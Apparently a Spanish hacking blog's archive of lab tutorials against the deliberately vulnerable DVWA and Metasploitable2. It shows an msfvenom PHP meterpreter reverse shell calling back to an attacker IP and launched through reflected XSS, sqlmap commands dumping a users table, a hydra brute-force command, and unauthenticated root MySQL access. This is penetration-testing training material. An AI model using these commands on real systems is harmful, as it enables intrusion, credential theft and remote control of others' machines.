viernes, 30 de septiembre de 2016

Subiendo shell con xss

Hola amigos.

Hoy vamos a jugar un poquito con xss, en esta ocasión, usaremos dvwa, ya que lo estamos haciendo últimamente.

Para trabajar, nos vamos a xss reflejado.



Si le damos a view code, obtendremos el código fuente


<?php if(!array_key_exists ("name"$_GET) || $_GET['name'] == NULL || $_GET['name'] == ''){

 
$isempty true;

} else {
        
 echo 
'<pre>';
 echo 
'Hello ' $_GET['name'];
 echo 
'</pre>';
    
}
?>



Como vemos, no hay ningún tipo de filtro.

Si insertamos un nombre, nos saluda y todo.



Comprobamos que es vulnerable a la inyección xss.

<script>alert("hola");</script>



Ahora crearemos un payload de php

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.134 LPORT=4444 R > meterpreter.php



Subimos meterpreter.php a la pagina web en el apartado upload






Ahora, abrimos el navegador y ponemos

<script>window.location=”http://192.168.1.134/dvwa/hackable/uploads/meterpreter.php”</script>






Ya estamos dentro.

Por favor, para poder seguir subiendo posts, es necesario que pinches en la publi. Muchas gracias.

viernes, 23 de septiembre de 2016

Blind SQL injection con nmap

Vamos a hacer blind sql injection con sqlmap.

Para eso, usaremos de nuevo burpsuite



En Iceweasel, abrirmos el open menu (las tres rayitas, una debajo de otra) → Preferences → Advanced → Network → Settings

Ahora, ponemos cualquier cosa en la caja de texto.





Ponemos



Contestamos

y

y

y


















Recordad. Para poder seguir subiendo posts al blog, necesito que le déis a la publicidad. Muchas gracias a todos.

viernes, 16 de septiembre de 2016

tutorial sqlmap

En esta ocasión, vamos a ver cómo se realiza una inyección SQL con sqlmap.

Para ello, abriremos nuestro amigo burpsuite.



En Iceweasel, abrirmos el open menu (las tres rayitas, una debajo de otra) → Preferences → Advanced → Network → Settings



Nuestra víctima está en la dirección 192.168.1.129, en el apartado de inyección de sql. Metemos el valor que queramos y le damos a “submit”



Si nos vamos a burpsuite obtenemos lo siguiente



Abrimos una terminal y ponemos

sqlmap -u "http://192.168.1.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=b5c2eb7ae2bce65ef420e69b7582d5a5; security=low" --dbs














sqlmap -u "http://192.168.1.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=b5c2eb7ae2bce65ef420e69b7582d5a5; security=low" -D dvwa –tables

sqlmap -u "http://192.168.1.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=b5c2eb7ae2bce65ef420e69b7582d5a5; security=low" -D dvwa -T users --columns
sqlmap -u "http://192.168.1.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=b5c2eb7ae2bce65ef420e69b7582d5a5; security=low" -D dvwa -T users -c user --columns




Podemos elegir un diccionario o intro para el diccionario por defecto. Yo pulsé intro.









viernes, 9 de septiembre de 2016

Ataque a fuerza bruta con hydra

Hola amigos.

En este caso vamos a hacer un ataque fuerza bruta para averiguar el usuario y la contraseña de una página web.

Usaremos la distribución metasploitable2, en su apartado dvwa, que es un servidor web con distintas vulnerabilidades. Para ello es necesario acceder a la ip de la máquina e ir al enlace dvwa. Y cuando nos salga en login, ponemos admin como usuario y password como contraseña (si váis hacia abajo, tenéis esta información).

Nos iremos a la pestaña bruteforce



Abriremos burpsuite



Burpsuite es un proxy web que, a medida que vamos navegando, nos va mostrando los parámetros que va utilizando. Para utilizarlo, deberemos, además de abrirlo, configurar el navegador para que lo utilice como proxy, para ello deberemos ir a Open menú (las tres rayitas que hay a la derecha, una debajo de otra) → Preferencias → Avanzadas → Red → Configuraciones → Configuración manual de proxy: http proxy: 127.0.0.1 puerto 8080.



Si escribimos cualquier cosa en el usuario y en la contraseña y miramos en la pestaña poxy → intercept de Burpsuite:



Bien, esos son los parámetros que se envían al servidor web. Para que le lleguen, le debemos permitir el paso pulsando el botón forward.



Por supuesto, el usuario y la contraseña son incorrectos.

Usaremos hydra en este formato para sacar ambos. Usaremos este formato.

hydra 192.168.1.133 -v http-get-form "/dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:Username and/or password incorrect.:H=Cookie: security=high; PHPSESSID=329be075ec787d0c7967483638ca25fa" -L usuarios -P top500passwords-2008



viernes, 2 de septiembre de 2016

Intrusión a metasploitable 2 parte 8 (y última)

Hola a todos.

Acabamos ya con la serie dedicada a metasploitable haciendo una intrusión a su base de datos.

3306/tcp open  mysql       MySQL 5.0.51a-3ubuntu5
| mysql-info: 
|   Protocol: 53
|   Version: .0.51a-3ubuntu5
|   Thread ID: 8
|   Capabilities flags: 43564
|   Some Capabilities: SupportsTransactions, Support41Auth, SupportsCompression, SwitchToSSLAfterHandshake, LongColumnFlag, ConnectWithDatabase, Speaks41ProtocolNew
|   Status: Autocommit
|_  Salt: 7HD[!-`|m0EJ$q2@-^sH

Ponemos 

mysql -h 192.168.1.129

Y, oh, sorpresa, nos deja meternos en el servidor sin autenticarnos ni nada.

Veamos quienes sómos 
 
 
 
Somos root.

Un grave fallo de seguridad. Nos deja entrar líbremente y encima somos root.

Veamos las bases de datos

Voy a ver qué hay en la base de datos mysql
Voy a ver qué hay en la base de datos dvwa
Pues eso. Por favor, hacer click a la publi. Happy Hacking ;-)